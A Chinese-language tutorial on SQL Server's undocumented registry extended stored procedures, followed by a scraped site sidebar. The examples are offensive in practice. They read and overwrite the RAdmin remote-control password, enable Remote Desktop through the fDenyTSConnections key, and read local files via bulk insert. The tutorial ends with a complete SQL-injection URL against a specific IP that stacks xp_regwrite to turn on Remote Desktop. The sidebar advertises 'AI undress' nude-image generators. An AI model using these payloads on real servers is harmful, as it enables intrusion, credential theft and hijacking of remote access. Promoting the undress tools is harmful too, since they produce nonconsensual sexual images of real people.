几个扩展存储过程使用方法
sqlserver里面有一些危险的扩展存储过程,可以操作注册表,所以很多情况下,下面的存储过程为了服务器安全都会将这些存储过程删除。不过防御与安全同等重要。下面是具体的注册的操作方法。
SQL Server中包含了几个可以访问系统的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
xp_regenumvalues 以多个记录集方式返回所有键值
使用方法:
xp_regenumvalues 根键, 子键
比如说,想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有键值:
use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
xp_regread 返回制定键的值
使用方法:
xp_regread 根键,子键,键值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密码
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
远程桌面开启为0
xp_regwrite 写入
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必须清空后再写新数值
修改成功的前提是值为空
注意值类型有2种REG_SZ 表示字符型,相当于新建字符串值,REG_DWORD 表示整型,相当于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用远程桌面
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
运行前提SA
可能用处不是很大,也没深入研究,因为觉得读asp用xp_makecab更方便点,仅供思维扩展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
开启远程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1377
52
From start to finish: How to use php extension cURL to make HTTP requests
Jul 29, 2023 pm 05:07 PM
From start to finish: How to use php extension cURL for HTTP requests Introduction: In web development, it is often necessary to communicate with third-party APIs or other remote servers. Using cURL to make HTTP requests is a common and powerful way. This article will introduce how to use PHP to extend cURL to perform HTTP requests, and provide some practical code examples. 1. Preparation First, make sure that php has the cURL extension installed. You can execute php-m|grepcurl on the command line to check
Extensions and third-party modules for PHP functions
Apr 13, 2024 pm 02:12 PM
To extend PHP function functionality, you can use extensions and third-party modules. Extensions provide additional functions and classes that can be installed and enabled through the pecl package manager. Third-party modules provide specific functionality and can be installed through the Composer package manager. Practical examples include using extensions to parse complex JSON data and using modules to validate data.
Steps and precautions for implementing batch updates using Oracle stored procedures
Mar 08, 2024 pm 04:12 PM
Title: Steps and Precautions for Implementing Batch Updates by Oracle Stored Procedures In Oracle database, stored procedures are a set of SQL statements designed to improve database performance, reuse code, and enhance security. Stored procedures can be used to update data in batches. This article will introduce how to use Oracle stored procedures to implement batch updates and provide specific code examples. Step 1: Create a stored procedure First, we need to create a stored procedure to implement batch update operations. The following is how to create a stored procedure
How to install mbstring extension under CENTOS7?
Jan 06, 2024 pm 09:59 PM
1.UncaughtError:Calltoundefinedfunctionmb_strlen(); When the above error occurs, it means that we have not installed the mbstring extension; 2. Enter the PHP installation directory cd/temp001/php-7.1.0/ext/mbstring 3. Start phpize(/usr/local/bin /phpize or /usr/local/php7-abel001/bin/phpize) command to install php extension 4../configure--with-php-config=/usr/local/php7-abel
How to delete stored procedure in MySQL
Sep 05, 2023 am 10:25 AM
MySQL methods for deleting stored procedures include using the DROP PROCEDURE statement, using MySQL Workbench, and using command line tools. Detailed introduction: 1. Use the DROP PROCEDURE statement. The steps are to first open the MySQL client or use any tool that supports MySQL, then connect to your MySQL database, and finally execute the following SQL statement to delete the stored procedure; 2. Use MySQL Workbench to delete Stored procedures and so on.
Oracle stored procedure: Implementation method to determine whether a table exists
Mar 08, 2024 pm 09:18 PM
Stored procedures in Oracle database are a specific type of stored procedures used to execute a series of SQL statements and data operations in the database. In actual database development work, sometimes we need to determine whether a certain table exists in the database, so that we can do some judgment and logical processing in the storage process. Below we will introduce how to implement the method of determining whether a table exists in Oracle database, and provide specific code examples. First, we can use the system table user_tables or all_t
Implementation principles and applications of Golang stored procedures
Feb 22, 2024 pm 04:57 PM
Implementation Principles and Applications of Golang Stored Procedures Stored procedures are precompiled programs that are stored in relational databases and can be called by applications. They can effectively reduce the cost of network transmission of data and improve the execution efficiency of the database. Although Golang does not directly support stored procedures, you can simulate the functions of stored procedures by using SQL statements. This article will introduce the principles and applications of implementing stored procedures in Golang, and provide specific code examples. 1. The implementation principle of Golang stored procedure is in Gol
How to write custom stored procedures and functions in MySQL using C#
Sep 22, 2023 am 09:42 AM
How to write custom stored procedures and functions in MySQL using C# Introduction: MySQL is a widely used open source database management system, and C# is a commonly used object-oriented programming language. During the development process, we often need to use database stored procedures and functions to improve code reusability and performance. This article will introduce how to use C# to write custom stored procedures and functions in a MySQL database, and provide specific code examples. 1. Stored procedures A stored procedure is a set of SQL statements that perform specific tasks.
